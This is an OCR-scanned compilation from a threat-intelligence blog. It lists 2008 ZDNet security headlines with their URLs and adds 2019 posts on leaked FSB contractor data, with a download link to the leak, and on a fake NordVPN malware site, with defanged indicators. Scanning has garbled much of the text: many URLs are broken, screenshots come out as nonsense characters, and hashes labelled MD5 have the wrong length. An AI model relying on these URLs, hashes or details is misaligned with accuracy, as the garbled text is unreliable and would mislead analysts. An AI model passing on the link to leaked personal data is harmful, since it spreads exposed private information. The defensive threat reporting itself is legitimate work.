Phishers apply quality assurance, start 
validating credit card numbers 

Categeston: forse) igat 256 Stealing Batoets Pass 


Tope Security: Quality: Aamcarce Shahing 


a@WiTakBak -S & Sponsored Links 


It’s been quite some time since | last posted a quality blog post regarding my ex-employer 
CBS Interactive’s ZDNet where | used to work as a Security Blogger for ZDNet’s Zero Day 
throughout 2008-2013 and | wanted to take the time and effort to say thanks to my Editor- 
in-Chief including Editorial Director - Larry Dignan and David Grober who provided editorial 
guidance including the publishing of the [lJoriginal post regarding my [2]disappearance circa 
2010 including the search for me. 


In this post I'll summarize my blogging activity at ZDNet’s Zero Day blog throughout 
2008-2013 providing my readers with the necessary data information and knowledge to stay 
ahead of current and emerging threats. 


ZDNet Zero Day Blog Posts - May, 2008 


¢ [3]Major career web sites hit by spammers attack 
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¢ [4]A U.S military botnet in the works 

¢ [5]DIY phishing kits introducing new features 

¢ [6]Redmond Magazine Successfully SQL Injected by Chinese Hacktivists 
¢ [7]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
¢ [8]The Storm Worm would love to infect you 

¢ [9]DoS Attacks Using SQL Wildcards Revealed 

¢ [10]Pro-Serbian hacktivists attacking Albanian web sites 

¢ [11]Over 1.5 million pages affected by the recent SQL injection attacks 
¢ [12]No security software, no E-banking fraud claims for you 

¢ [13]Google introducing Safe Browsing diagnostic to help owners of compromised sites 
¢ [14]Facebook vulnerable to critical XSS, could lead to malware attacks 
¢ [15]Tracking down the Storm Worm malware 

¢ [16]Top ten worst spam registrars notified by ICANN 

¢ [17]Open source software security improving 

¢ [18]Who keeps failing their FISMA compliance? 

¢ [19]Botnets committing click fraud observed 

¢ [20]ICANN warning against registrar impersonation phishing attacks 

¢ [21]Attacks on NFC mobile phones demonstrated 

¢ [22]Comcast’s DNS records hijacked, redirect to hacked page 

¢ [23]How was Comcast.net hijacked? 

¢ [24]Chinese female hacking group spotted 

¢ [25]Microsoft’s CAPTCHA successfully broken 


ZDNet Zero Day Blog Posts - June, 2008 


¢ [26]Phoenix Mars Lander’s mission site hacked 


¢ [27]Online brand-jacking increasing 
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¢ [28]Metasploit Project’s site hijacked through ARP poisoning 

¢ [29]Privacy flaw exposes Paris Hilton and Lindsay Lohan’s private MySpace photos 
¢ [30]Skype patches security policy bypassing vulnerability 

¢ [31]Who’s behind the GPcode ransomware? 

¢ [32]Proof of Concept "carpet bombing" exploit released in the wild 

¢ [33]Fake ImageShack site serving malware, links distributed over IM 

¢ [34]How to recover GPcode encrypted files? 

¢ [35]Photobucket’s DNS records hijacked by Turkish hacking group 

¢ [36]A security company wants you to DDoS its servers 

¢ [37]China detains web site defacer spreading earthquake rumors 

¢ [38]Security breach hits DivShare, unauthorized access to its database 

¢ [39]Local root escalation vulnerability in Mac OS X 10.4 and 10.5 discovered 

¢ [40]Phishers targeting Facebook users, fake logins spammed through hacked accounts 
¢ [41]Trojan exploiting unpatched Mac OS X vulnerability in the wild 

¢ [42]Spam attack shut downs Marshall Islands email service 

¢ [43]200,000 sites spreading web malware, China’s hosting the most 

¢ [44]ICANN and IANA’s domains hijacked by Turkish hacking group 

¢ [45]HSBC sites vulnerable to XSS flaws, could aid phishing attacks 


ZDNet Zero Day Blog Posts - July, 2008 


¢ [46]Blizzard introducing two-factor authentication for WoW gamers 

¢ [47]Sony PlayStation’s site SQL injected, redirecting to rogue security software 
¢ [48]300 Lithuanian sites hacked by Russian hackers 

¢ [49]Antivirus vendor introducing virtual keyboard for secure Ebanking 


¢ [50]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers 
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¢ [51]Storm Worm’s Independence Day campaign 

¢ [52]Approximately 800 vulnerabilities discovered in antivirus products 

¢ [53] $1 Million prize offered for cracking an encryption algorithm 

¢ [54]U.K’s most spammed person receives 44,000 spam emails daily 

¢ [55]Storm Worm says the U.S have invaded Iran 

¢ [56]Gmail, PayPal and Ebay embrace DomainKeys to fight phishing emails 

¢ [57]Verizon, Telecom Italia, and Brasil Telecom top the botnet charts in Q2 of 2008 
¢ [58]XSS worm at Justin.tv infects 2,525 profiles 

¢ [59]Remote code execution through Intel CPU bugs 

¢ [60]Ringleader of cybercrime group to be offered a job as cybercrime fighter 
¢ [61]Spam coming from free email providers increasing 

¢ [62]Kaspersky’s Malaysian site hacked by Turkish hacker 

¢ [63]Georgia President’s web site under DDoS attack from Russian hackers 

¢ [64]75 % of online banking sites found vulnerable to security design flaws 


¢ [65]McAfee debunks recent vulnerabilities in AV software research, n.runs restates its 
position 


¢ [66]Click fraud in 2nd quarter of 2008 more sophisticated, botnets to blame 


¢ [67]How OpenDNS, PowerDNS and MaraDNS remained unaffected by the DNS cache poi- 
soning vulnerability 


¢ [68]DNS cache poisoning attacks exploited in the wild 

¢ [69]The Neosploit cybercrime group abandons its web malware exploitation kit 

¢ [70]OS fingerprinting Apple’s iPhone 2.0 software - a "trivial joke" 

¢ [71]HD Moore pwned with his own DNS exploit, vulnerable AT &T DNS servers to blame 


ZDNet Zero Day Blog Posts - August, 2008 
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¢ [72]Cuil’s stance on privacy - "We have no idea who you are" 

¢ [73]Phishers increasingly scamming other phishers 

¢ [74]Today’s assignment : Coding an undetectable malware 

¢ [75]Consumer Reports urges Mac users to dump Safari, cites lack of phishing protection 
¢ [76]Fake CNN news items malware campaign spreading rapidly 

¢ [77]CNET’s Clientside developer blog serving Adobe Flash exploits 

¢ [78]Coordinated Russia vs Georgia cyber attack in progress 


¢ [79]Researcher discovers Nokia S40 security vulnerabilities, demands 20,000 euros to 
release details 


¢ [80]Intel proactively fixes security flaws in its chips 

¢ [81]1.5m spam emails sent from compromised University accounts 

¢ [82]Fortune 500 companies use of email spoofing countermeasures declining 
¢ [83]China busts hacking ring, managed to penetrate 10 gov’t databases 
¢ [84]Scammers caught backdooring chip and PIN terminals 

¢ [85]SpamZa - opt in spamming service fighting to remain online 

¢ [86]FEMA’s PBX network hacked, over 400 calls made to the Middle East 
¢ [87]Typosquatting the U.S presidential election - a security risk? 

¢ [88]Hundreds of Dutch web sites hacked by Islamic hackers 

¢ [89]Twitter’s "me too" anti-spam strategy 

¢ [90]Malware detected at the International Space Station 

¢ [91]Taiwan busts hacking ring, 50 million personal records compromised 
¢ [92]MSN Norway serving Flash exploits through malvertising 

¢ [93]Inside India’s CAPTCHA solving economy 


ZDNet Zero Day Blog Posts - September, 2008 
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[94]DoS vulnerability hits Google’s Chrome, crashes with all tabs 
[95]Malware and spam attacks exploiting Picasa and ImageShack 
[96]Spamming vendor launches managed spamming service 

[97 ]Facebook introducing new security warning feature 

[98]Google downplays Chrome’s carpet-bombing flaw 

[99]Targeted malware attack against U.S schools intercepted 

[100]The most "dangerous" celebrities to search for in 2008 
[101]Norwegian BitTorrent tracker under DDoS attack 

[102]Attacker: Hacking Sarah Palin’s email was easy 

[103 ]Bill O’Reilly’s web site hacked, attackers release personal details of users 
[104]India’s government: At last, we’ve cracked Blackberry’s encryption 
[105]Memory exhaustion DoS vulnerability hits Google’s Chrome 
[106]44 % of second hand mobile devices still contain sensitive data 


[107]Spammers attacking Microsoft’s CAPTCHA - again 


ZDNet Zero Day Blog Posts - October, 2008 


Cybercriminals syndicating Google Trends keywords to serve malware 
Scammers introduce ATM skimmers with built-in SMS notification 
Atrivo/Intercage’s disconnection briefly disrupts spam levels 

Adobe posts workaround for clickjacking flaw, NoScript releases ClearClick 
Asus ships Eee Box PCs with malware 

Fake Microsoft Patch Tuesday malware campaign spreading 

Secunia: popular security suites failing to block exploits 

Survey: 88 % of Mumbai’s wireless networks easy to compromise 


Adobe’s Serious Magic site SQL Injected by Asprox botnet 
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¢ Inside an affiliate soam program for pharmaceuticals 

* Google to introduce warnings for potentially hackable sites 

¢ Lack of phishing attacks data sharing puts $300M at stake annually 

* CardCops: Stolen credit card details getting cheaper 

¢ Cybercrime friendly EstDomains loses ICANN registrar accreditation 

e Phishers apply quality assurance, start validating credit card numbers 


* Spammers targeting Bebo, generate thousands of bogus accounts 


ZDNet Zero Day Blog Posts - November, 2008 


¢ Black market for zero day vulnerabilities still thriving 

* Google and T-Mobile push patch for Android security flaw 

¢ Fake WordPress site distributing backdoored release 

¢ Koobface Facebook worm still spreading 

¢ Cyber terrorists to face death penalty in Pakistan 

¢ AVG and Rising signatures update detects Windows files as malware 
¢ BBC hit by a DDoS attack 

* Google fixes critical XSS vulnerability 

¢ $10k hacking contest announced 

¢ Anti fraud site hit by a DDoS attack 

¢ Commercial vendor of spyware under legal fire 

¢ Fake Windows XP activation trojan goes 2.0 

¢ Cybercriminals release Christmas themed web malware exploitation kit 
¢ Google: no evidence of a Gmail vulnerability 

¢ New worm exploiting MSO08-067 flaw spotted in the wild 


¢ Microsoft's Live launches malware detection service for webmasters 
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ZDNet Zero Day Blog Posts - December, 2008 


. https://www.zdnet.com/article/we-need-help-with-the-strange-disappearance-of-dancho-danchev/ 
. https: //ddanchev. blogspot .com/2018/10/dancho-danchevs-2010-disappearance.htm 
://www.zdnet.com/article/major-career-web-sites-hit-by-spammers-attack/ 


.com/article/a-u-s-military-botnet- in-the-works/ 


.com/article/a-u-s-military-botnet-in-the-works/ 
.com/article/a-u-s-military-botnet- in-the-works/ 


1 

2 

3 

4 

5. zdnet.com/article/a-u-s-military-botnet-in-the-works/ 

6 

7 

8 zdnet.com/article/the-storm-worm-would-love-to-infect-you/ 
9 


. https://www.zdnet .com/article/facebook-vulnerable-to-critical-xss-could-lead-to-malware-attacks/ 


15. https://www.zdnet .com/article/tracking-down-the-storm-worm-malware/ 


. https://www.zdnet.com/article/top-ten-worst-spam-registrars-notified-by-icann/ 


17. bttps://www.zdnet .com/article/open-source-software-security-improving/ 


. https://www.zdnet .com/article/who-keeps-failing-their-fisma-compliance/ 


19. bttps://www.zdnet .com/article/botnets-committing-click-fraud-observed/ 


. https://www.zdnet.com/article/icann-warning-against-registrar- impersonation-phishing-attacks/ 


21. https://www.zdnet.com/article/attacks-on-nfc-mobile-phones-demonstrated/ 


. bttps://www.zdnet.com/article/comcasts-dns-records-hijacked-redirect-to-hacked-page/ 


. https://www.zdnet.com/article/comcasts-dns-records-hijacked-redirect-to-hacked-page/ 


24. https://www.zdnet.com/article/chinese-female-hacking-group-spotted/ 
25. https://www.zdnet.com/article/microsofts-captcha-successfully-broken/ 


://waw.zdnet .com/article/phoenix-mars-landers-mission-site-hacked/ 
://www.zdnet.com/article/online-brand-jacking-increasing/ 
://www.zdnet.com/article/metasploit-projects-site-hijacked-through-arp-poisoning/ 


://www.zdnet .com/article/privacy-flaw-exposes-paris-hilton-and-lindsay-lohans-private-myspace-photo 


. https://www.zdnet.com/article/skype-patches-security-policy-bypassing-vulnerability/ 


31. https://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/ 


. https://www.zdnet.com/article/proof-of-concept-carpet-bombing-exploit-released- in-the-wild/ 


. https://www.zdnet.com/article/fake-imageshack-site-serving-malware-links-distributed-over-im/ 
34, 
://www.zdnet.com/article/photobuckets-dns-records-hijacked-by-turkish-hacking-group/ 
://waw.zdnet.com/article/a-security-company-wants-you-to-ddos-its-servers/ 


.zdnet.com/article/china-detains-web-site-defacer-spreading-earthquake-rumors/ 


://waw.zdnet.com/article/security-breach-hits-divshare-unauthorized-access-to-its-database/ 
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.com/article/local-root-escalation-vulnerability-in-mac-os-x-10-4-and-10-5-discovered/ 


://www.zdnet.com/article/phishers-targeting-facebook-users-fake-logins-spammed-through-hacked-acco 


://www.zdnet.com/article/trojan-exploiting-unpat ched-mac-os-x-vulnerability-in-the-wild/ 


://www.zdnet.com/article/spam-attack- shut-downs-marshall-islands-email-service/ 
.com/article/200000-sites-spreading-web-malware-chinas-hosting-the-most/ 
.com/article/icann-and- ianas-domains-hijacked-by-turkish-hacking-group/ 

://www.zdnet.com/article/hsbc-sites-vulnerable-to-xss-flaws-could-aid-phishing-attacks/ 

://www.zdnet.com/article/blizzard-introducing-two-factor-authentication-for-wow-gamers/ 


://www.zdnet.com/article/sony-playstations-site-sql-injected-redirecting-to-rogue-security-software 


ttps://www .com/article/300-lithuanian-sites—hacked-by-russian-hackers/ 


ttps://www .com/article/antivirus-vendor-introducing-virtual-keyboard-for-secure-ebanking/ 


. https://www.zdnet .com/article/gmail-yahoo-and-hotmails-captcha-broken-by-spammers/ 
51. 
ttps://www.zdnet .com/article/approximately-800-vulnerabilities-discovered-in-antivirus-products/ 
ttps://www.zdnet .com/article/1-million-prize-offered-for-cracking-an-encryption-algorithm/ 
ttps://www.zdnet .com/article/u-ks-most- spammed-person-receives-44000-spam-emails-daily/ 
ttps://www.zdnet .com/article/storm-worm-says-the-u-s-have-invaded-iran/ 
ttps://www.zdnet .com/article/gmail-paypal-and-ebay-embrace-domainkeys-to-fight-phishing-emails/ 


ttps://www.zdnet.com/article/verizon-telecom-italia-and-brasil-telecom-top-the-botnet-charts-in-q2-of 


.com/article/xss-worm-at- justin-tv-infects-2525-profiles/ 
.com/article/remote-code-execution-through-intel-cpu-bugs/ 

.zdnet .com/article/ringleader-of-cybercrime-group-to-be-offered-a- job-as-cybercrime-fighter/ 

.zdnet .com/article/spam- coming-from-free-email-providers-increasing/ 

.zdnet .com/article/kasperskys-malaysian-site-hacked-by-turkish-hacker/ 
.com/article/georgia-presidents-web-site-under-ddos-attack-from-russian-hackers/ 
.com/article/75-of-online-banking-sites-found-vulnerable-to-security-design-flaws/ 


.com/article/mcafee-debunks-recent-vulnerabilities-in-av-software-research-n-runs-resta 


.com/article/click-fraud-in-2nd-quarter-of-2008-more-sophisticated-botnets-to-blame/ 


. com/article/how- opendns- powerdns-and-maradns-remained-unaffected-by-the-dns-cache-pois 
.com/article/dns-cache-poisoning-attacks-exploited-in-the-wild/ 


.com/article/the-neosploit-cybercrime-group-abandons-its-web-malware-exploitation-kit/ 


.com/article/os-fingerprinting-apples-iphone-2-0-software-a-trivial-joke/ 


.com/article/cuils-stance-on-privacy-we-have-no-idea-who-you-are/ 


.com/article/phishers- increasingly-scamming-other-phishers/ 


74, https: //www.zdnet.com/article/todays-assignment-coding-an-undetectable-malware/ 


. https://www.zdnet.com/article/consumer-reports-urges-mac-users-to-dump-safari-cites-lack-of-phishing-pro 


ttps://www.zdnet.com/article/fake-cnn-news-items-malware-campaign-spreading-rapidly/ 


ttps://www.zdnet.com/article/cnets-clientside-developer-blog-serving-adobe-flash-exploits/ 
ttps://www.zdnet.com/article/coordinated-russia-vs-georgia-cyber-attack-in-progress/ 


ttps://www.zdnet.com/article/researcher-discovers-nokia-s40-security-vulnerabilities-demands-20000-euro 


s-to-release-details/ 


ttps://www.zdnet .com/article/intel-proactively-fixes-security-flaws-in-its-chips/ 
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://waw.zdnet.com/article/1-5m-spam-emails-sent-from-compromised-university-accounts/ 
://waw.zdnet.com/article/1-5m-spam-emails-sent-from-compromised-university-accounts/ 


://www.zdnet.com/article/china-busts-hacking-ring-managed-to-penetrate-10-govt-databases/ 


://www.zdnet.com/article/scammers- caught-backdooring-chip-and-pin-terminals/ 


://wiw.zdnet.com/article/spamza-opt- in-spamming-service-fighting-to-remain-online/ 
://waw.zdnet .com/article/femas-pbx-network-hacked-over-400-calls-made-to-the-middle-east/ 
://www.zdnet.com/article/typosquatting-the-u-s-presidential-election-a-security-risk/ 


://waw.zdnet.com/article/hundreds- of-dutch-web-sites-hacked-by-islamic-hackers/ 


89. https://www.zdnet.com/article/twitters-me-too-anti-spam-strategy/ 
90. https://www.zdnet.com/article/twitters-me-too-anti-spam-strategy/ 


. bttps://www.zdnet.com/article/taiwan-busts-hacking-ring-50-million-personal-records-compromised/ 


://www.zdnet.com/article/msn-norway-serving-flash-exploits-through-malvertising/ 
://www.zdnet.com/article/inside-indias-captcha-solving-economy/ 
://waw.zdnet.com/article/dos-vulnerability-hits-googles-chrome-crashes-with-all-tabs/ 
://www.zdnet.com/article/malware-and-spam-attacks-exploiting-picasa-and- imageshack/ 


://waw.zdnet.com/article/spamming-vendor-launches-managed- spamming-service/ 


://waw.zdnet.com/article/facebook- introducing-new-security-warning-feature/ 
98. https://www.zdnet.com/article/google-downplays- chromes-carpet-bombing-flaw/ 


. https://www.zdnet.com/article/targeted-malware-attack-against-u-s-schools-intercepted/ 


. https: //www.zdnet .com/article/the-most-dangerous-celebrities-to-search-for-in-2008/ 
101. 
102. https: //www.zdnet .com/article/attacker-hacking-sarah-palins-email-was-easy/ 
103. https://www.zdnet .com/article/bill-oreillys-web-site-hacked-attackers-release-personal-details-of-use 
104. https: //www.zdnet .com/article/indias-government-at-last-weve-cracked-blackberrys-encryption/ 


105. https: //www.zdnet .com/article/memory-exhaustion-dos-vulnerability-hits-googles-chrome/ 


106. https: //www.zdnet .com/article/44-of-second-hand-mobile-devices-still-contain-sensitive-data/ 


107. https: //www.zdnet .com/article/spammers-attacking-microsofts-captcha-again/ 


15.7 August 


15.7.1 Assessing the Recently Leaked FSB Contractor Data - A Peek Inside Russia’s 
Understanding of Social Network Analysis and Tailored Access Operations 
(2019-08-02 15:20) 


I’ve recently managed to obtain a copy of the recently leaked FSB contractor data courtesy of 
Ovlru $ and "Digital Revolution" and I’ve decided to take a closer look including an in-depth 
overview and discussion of the leaked data in the context of today’s modern-driven Al-powered 
automated OSINT technologies in the broader context of the U.S Intelligence Community in 
particular the utilization of rogue TOR exit nodes for the purpose of intercepting and har- 
vesting TOR exit node data within the Russian Federation including social-network analysis 
data-mining and possible "lawful surveillance" and "lawful interception" including possible 
data collection type of Tailored Access Operation campaigns launched by "Oday Technologies" 
and "SyTech". 


Sample Company Logo: 
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technovogies 


Oday technologies 


KOHCyNbTalMOHHble yonyru 


Sample Company Logo: 
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SyTech 


science is your technology 


Sample personal photos of the individuals behind "Oday Technologies" and "SyTech": 
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Sample Screenshots of the User-Interface behind the "Lawful Surveillance" and "Lawful 
Interception": 
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Sample Screenshots of the Rogue and Bogus Tor-Exit-Node Research Project: 
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<< 
Tor client; 


; = Guard Node Relay Node 


Exit Node 


Sample URLs involved in the campaign: 


hxxp://Oday.ru 


hxxp://sytech.ru 


Sample Telegram account involved in the campaign: 


hxxp://t.me/D1G1R3V _DigitalRevolution 
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Sample Vkontakt account involved in the campaign: 


hxxp://vk.com/d1g1r3v 


Sample Twitter account involved in the campaign: 
hxxp://twitter.com/d1g1ir3v 


hxxp://twitter.com/Ov1ruS 


Sample URL known to have participated in the campaign: 


hxxp://d1g1r3v.net 


Related URL of the currently leaked data: 


https://mega.nz/ #F!3cOlTaLl!jVUS O7QOopCHUPYgK1E _w 


15.7.2 gOt Bitcoin? (2019-08-19 12:51) 
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Cybertronics 


Dear blog readers, dare to take a moment of your precious time to check a venerable and 
recently proposed cyber security project investment including the opportunity to enter a Bold 
New World of Hacking and Information Security? Has the time come to set them straight? 
Keep reading. 


Check out this Onion - http://Ikzihepprihxtvbutjedoazbsqd4avmif - 
hpjms3zuq7itceiu4qajwad.onion/ and donate today! 


Stay tuned! 


15.8 September 


15.8.1 DDanchev is for Hire! (2019-09-07 14:38) 
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Looking for a full time threat intelligence analyst, cybercrime researcher, or a security blogger? 


Approach me at dancho.danchev@hush.com 


15.8.2 Historical OSINT - The Russian Business Network Says "Hi" (2019-09-09 15:27) 
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Wholesale domain registration and internet services -- OnlineNIC Inc. - Mozilla Firefox 


Gann fpecxes Bea Mypren jexemeno: crpyrers: Crosses 


° Cc cA (a https: (eww oninenc.com/tp_engkgh manage _accountieccout_ist.php ° ie ° + 
= Choose Type © ater Yea O Before Yes ‘« 

» Value-Added Services 

me Year ¥ | Month ¥ Day ¥ Month ¥ ODay ¥ 
* TemplatelAP! 

Ne 
* SSL Certificate 
» Mercham Account 

Subenit Download 
* Domain Monetizing 
» Domain After Market © Current Domain Status 
* Customization 
No. Transaction Time Sum Mode Note 


Quick Access 
¥ Customize Quick Access 


¥ Bulk Register 


You know you’re popular when "they" say "hi". 


It’s 2009 and I’ve received a surprising personal email courtesy of guess who - The Rus- 
sian Business Network showing off the actual ownership of the hxxp://ronnetwork.com domain 
and basically saying "hi". It’s worth pointing out that throughout 2008-2013 I’ve extensively 
profiled the activities including the customer activities of some of the most prolific customers 
and members of the infamous Russian Business Network also known as the RBN in the context 
of [1]blackhat SEO [2]iFrame and [3]input validation abuse across major [4]Web properties 
including [5]malvertising and various other [6]malware-serving and [7]client-side exploits 
serving campaigns including [8]money mule recruitment and [9]phishing campaigns the 
ubiquitous at the time [10]fake security software also known as scareware in a variety of post 
series. 


¢ Related post - [11]Dissecting a Sample Russian Business Network (RBN) Con- 
tract/Agreement Through the Prism of RBN’s AbdAllah Franchise 


It’s been a decade since | last profiled the most prolific and sophisticated market-leading 
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bullet-proof hosting cybercrime enterprise - the Russian Business network which at the time 
was dominating the majority of campaigns that | was busy profiling with the help of fellow 
researchers to whom | owe a big deal of thanks for approaching me circa 2008-2013 namely 
[12]Jart Armin and [13]James McQuaid with whom I’ve been directly or indirectly keeping 
in touch throughout 2008-2013 for the purpose of offering quality research on the activities 
of the Russian Business Network including their customers and fraudulent and malicious 
Campaigns. 


¢ Related post - [14]Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against 
Multiple International Embassies 


Stay tuned and thanks for reaching out! 


Related Russian Business Network (RBN) Research: 
[15]I See Alive IFRAMEs Everywhere - Part Two 

[16]| See Alive IFRAMEs Everywhere 

[17]Bank of India Serving Malware 

[18]U.S Consulate in St.Petersburg Serving Malware 
[19]Syrian Embassy in London Serving Malware 
[20]CISRT Serving Malware 

[21]Compromised Sites Serving Malware and Spam 
[22]U.S Consulate St. Petersburg Serving Malware 
[23]Massive RealPlayer Exploit Embedded Attack 
[24]Malware Serving Exploits Embedded Sites as Usual 
[25]MDAC ActiveX Code Execution Exploit Still in the Wild 
[26]Yet Another Massive Embedded Malware Attack 
[27]Embedding Malicious IFRAMEs Through Stolen FTP Accounts 
[28]Over 100 Malwares Hosted on a Single RBN IP 


[29]Detecting and Blocking the Russian Business Network 
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[30]Exposing the Russian Business Network 
[31]Go to Sleep, Go to Sleep my Little RBN 
[32]Injecting IFRAMEs by Abusing Input Validation 
[33]RBN’s Fake Account Suspended Notices 
[34]ZDNet Asia and TorrentReactor IFRAME-ed 
[35]Russia’s FSB vs Cybercrime 

[36]HACKED BY THE RBN! 

[37]Rogue RBN Software Pushed Through Blackhat SEO 
[38]Wired.com and History.com Getting RBN-ed 
[39]The Russian Business Network 

[40]Exposing the Russian Business Network 
[41]More CNET Sites Under IFRAME Attack 
[42]Embedded Malware at Bloggies Awards Site 
[43]Have Your Malware In a Timely Fashion 
[44]Geolocating Malicious ISPs 

[45]More High Profile Sites IFRAME Injected 
[46]The New Media Malware Gang - Part Four 


[47 ]Another Massive Embedded Malware Attack 


1. https: //ddanchev . blogspot . con/search/1abel/Blackhat,20SE0 

2, hps://ddanchev blogspot. con/2006/03/adnet~asia-and-torrentreactor~iirane-ed. all 
3. https: //ddanchev. blogspot .com/2008/03/injecting-iframes-by-abusing- input .htm 

de Roepe cise oesgee cat n/t eee cate ieee eae teas rere ed 

5, hps://ddanchov blogspot. con/search/label/Malvertising 
6 
7 
8 
9 


. https: //ddanchev. blogspot . com/search/label/Online/,20Fraud 
_petps:/ /Adanchev. blogspot .con/search/ Label (Client Side/20BxpLoi¥s 
. https: //ddanchev. blogspot . com/search/label/Money’%,20Mule 
_netps://Adanchov. blogspot .con/search/Iabel/Phishing/20Canpaiga 


ttps://ddanchev. blogspot .com/2011/02/a-diverse-portfolio-of-fake-security.htm 


11. https: //ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.htm 
12. http://rbnexploit.blogspot.com/ 
13. https: //securehomenetwork. blogspot .com/ 


ttps://ddanchev. blogspot .com/2017/05/historical-osint- inside-2007-2009. htm 
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. https://ddanchev. blogspot .com/2017/05/historical-osint-inside- 2007-2009. htm 


16. https://ddanchev. blogspot .com/2007/11/i-see-alive-iframes-everywhere.htm 
17. http: //ddanchev.blogspot.com/2007/08/bank- of -india-serving-malware.htm 


http: //ddanchev . blogspot . com/2007/08/bank-of -india~serving-malware. htm] 
18. 
18, 
20. 
21. 
22. 
23. hrctpa: //ddanchev .blogspot SP ee htm 
24. https://ddanchev.blogspot .com/2008/01/massive-realplayer-exploit-embedded.htm 
25. : ; : -activex- = ion- 
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. https ://ddanchev.blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


. https: //ddanchev.blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


. https://ddanchev.blogspot .com/2007/11/detecting-and-blocking-russian-business.htm 


. https://ddanchev.blogspot .com/2008/03/injecting-iframes—by-abusing- input. htm 
33. https://ddanchev.blogspot . com/2008/01/rbn-fake-account-suspended-notices.htm 
34, https: //ddanchev. blogspot . com/2008/03/zdnet-asia~and-torrentreactor-iframe-ed. html 
_ https ://ddanchev blogspot . com/2008/03/zdnet~asia~and-torrentreactor- iframe-ed.htm1 
36. https://ddanchev.blogspot . com/2008/04/hacked-by-rbn. htm 
37. https: //ddanchev.blogspot . com/2008/03/rogue-rbn-software-pushed-through.htm 
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. https: //ddanchev.blogspot . com/2008/03/wiredcom-and-historycom-getting-rbn-ed.htm 


. https: //ddanchev.blogspot . com/2008/03/wiredcom-and-historycom-getting-rbn-ed.htm 


40. https: //ddanchev. blogspot . com/2007/11/exposing-russian-business-network.htm 
41. https://ddanchev. blogspot .com/2007/11/exposing-russian-business-network.htm 

. https: //ddanchev. blogspot . com/2008/03/embedded-malware-at~bloggies-awards-site html 
43. https: //ddanchev. blogspot . com/2008/03/embedded-malware-at-bloggies-awards-site html 
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44. https://ddanchev. blogspot . com/2008/02/geolocating-malicious-isps.htm 


. https://ddanchev. blogspot . com/2008/03/more-high-profile-sites-iframe-injected.htm 


47, neeps://Adanchev blogspot, con/2007/11/another-nassive~enbedded-nalvare-atack. Neal 


46. https: //ddanchev. blogspot . com/2008/03/the-new-media-malware-gang-part-four.htm 
. https://ddanchev. blogspot .com/2007/11/another-massive- embedded-malware-attack.htm 


15.8.3 Join Me on Patreon Community! (2019-09-09 18:07) 
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Dear blog readers, 


| decided to let everyone know that I’ve recently launched my own [1]Patreon Commu- 
nity Page with the idea to let everyone know that I’m currently busy crowd-funding a 
high-profile upcoming Cyber Security Investment Project - and | would love to hear from you 
more details about your thoughts regarding new Tier Features and whether or not you could 
make a possible long-term type of financial donation or sponsorship regarding my research 


and my security expertise. 


The current status of the project: 


- I’m currently busy soliciting additional input from colleagues regarding upcoming Tier 
Features 


- I'm currently busy reaching out to colleagues to possibly convert them to Patreon Sponsors 
- I’m currently busy working on a high-profile Security Podcast 


- I'm currently busy working on a high-profile Security Newsletter 


Has my research helped you or your organization in the past? Have you been a long-time blog 
reader? Have you learned something new? Did my active cybercrime and nation-state actor 
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profiling helped you excel in your career path? Are you happy with what you’re seeing? Dare 
to take a moment and refer a colleague or an organization my personal blog including my 
[2]Patreon Community Page including a possible Patreon Sponsor request confirmation? 


Looking forward to hearing from you at - dancho.danchev@hush.com 


Enjoy! 


1. https: //www.patreon.com/bePatron?u=1588023 
2. https: //www.patreon.com/ddanchev12 


15.8.4 Who’s th3j35t3r? - An OSINT Analysis (2019-09-10 17:07) 


15.8.5 Fake NordVPN Web Site Drops Banking Malware Spotted in the Wild 
(2019-09-11 16:53) 


FA Oftxial Website | The Gest Vr x + 


3) https://nord-vpn.dub * R © 


Cort#xate 


AF NordvPn dant ‘Seats | Combet 


RL Certihcate tatormation 


This certiicate ts mtended for the tellewing perpose(s): 
¢ Crees fe entity of a remote computer 
Proves your chntty to a remote computer 
e22350.121 
*L26taLeerdis 


Recommended by Ciel & PE * Refer to the certficston authentys statement for Geta 


Our offer is ending soon sisi egal 


Vald from O)-tup-19 to Ol-ftew- 19 


Don't miss your chance to get our 1-year deal for FREE. 


00: 09: 33:24 


This website uses cookies to improve the user expenence. To learn more about cur cookie polkcy of withdraw from it, please check our 


Privacy Pobcy 


I’ve recently came across to a rogue NordVPN web site distributing malicious software po- 
tentially exposing NordVPN users to a multi-tude of malicious software further compromising 
the confidentiality availability and integrity of the targeted host to a multi-tude of malicious 
software. 
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In this post, I’ll provide actionable intelligence on the infrastructure behind the campaign and 
discuss in-depth the tactics techniques and procedures of the cybercriminals behind it. 


Sample malicious URL known to have participated in the campaign: 


hxxp://nord-vpn.club - 192.64.119.159; 2.56.215.159 


Sample malicious MD5s known to have participated in the campaign: 

MD5: 3c24aa2c26e3556194ffd182a4dfaae5a41f 

MD5: 7d6c24992eff0d64f19c78f05ea95ae44bc83afl 

MD5: d39c320c3a43873db2577b2c9c99d9bf2bdb285c 

MD5: d5ed3c70a8d7213ed1b9a124bbc1942e2b8cfeea 

MD5: e89efde8ae72857b1542e3ae47f047c54b3d341a 

MD5: 59f511ea1e34753f41a75e05de96456ca28f14a7 

MD5: 453c428edda0fc01b306cc6f3252893fce9763a7 

15.8.6 Historical OSINT - Georgian Justice Department and Georgia Ministry of 


Defense Compromised Serving Malware Courtesy of the Kneber Botnet 
(2019-09-11 19:07) 


bosoOmgg~mol mog~oggob LodnbebGGm - Mozilla Firefox 


File Edit Yiew History Bookmarks Jools Help 


<a -¢ © @ hittpswww.mod.gov.ge/ v| |2§~ filezitia a 
@ LoJoHanggemmd mogw@oygod bodo6... SP v 
eee . 


LOBNGOL440) > 


= ‘4 ssdot mls 
SY N3 38NL LOBNENLSAM 


BOOTH 06O0565000 > 


HIKIG > LOEWS0 | TISSOUSIAID | STSGQNGIGITS 1 06606300000 1 FAQ | d89CS0 I dM6S0080 ENGUSH <i 


anQHaoobhyd OVO babdgen geen boog6e gobsancegd0d dOmgbywo 
Boote Find eo boMecomds Bape 


TISORIIOON VMIIIGIESIS0 > 


306G008I08I80 > 


BOWIGOLIS ION dOlGI]IO > 


es OO OOO 
) 
z 
: rMafinr en MANDAN hadammornman = 
| asians - - a © 
Done 
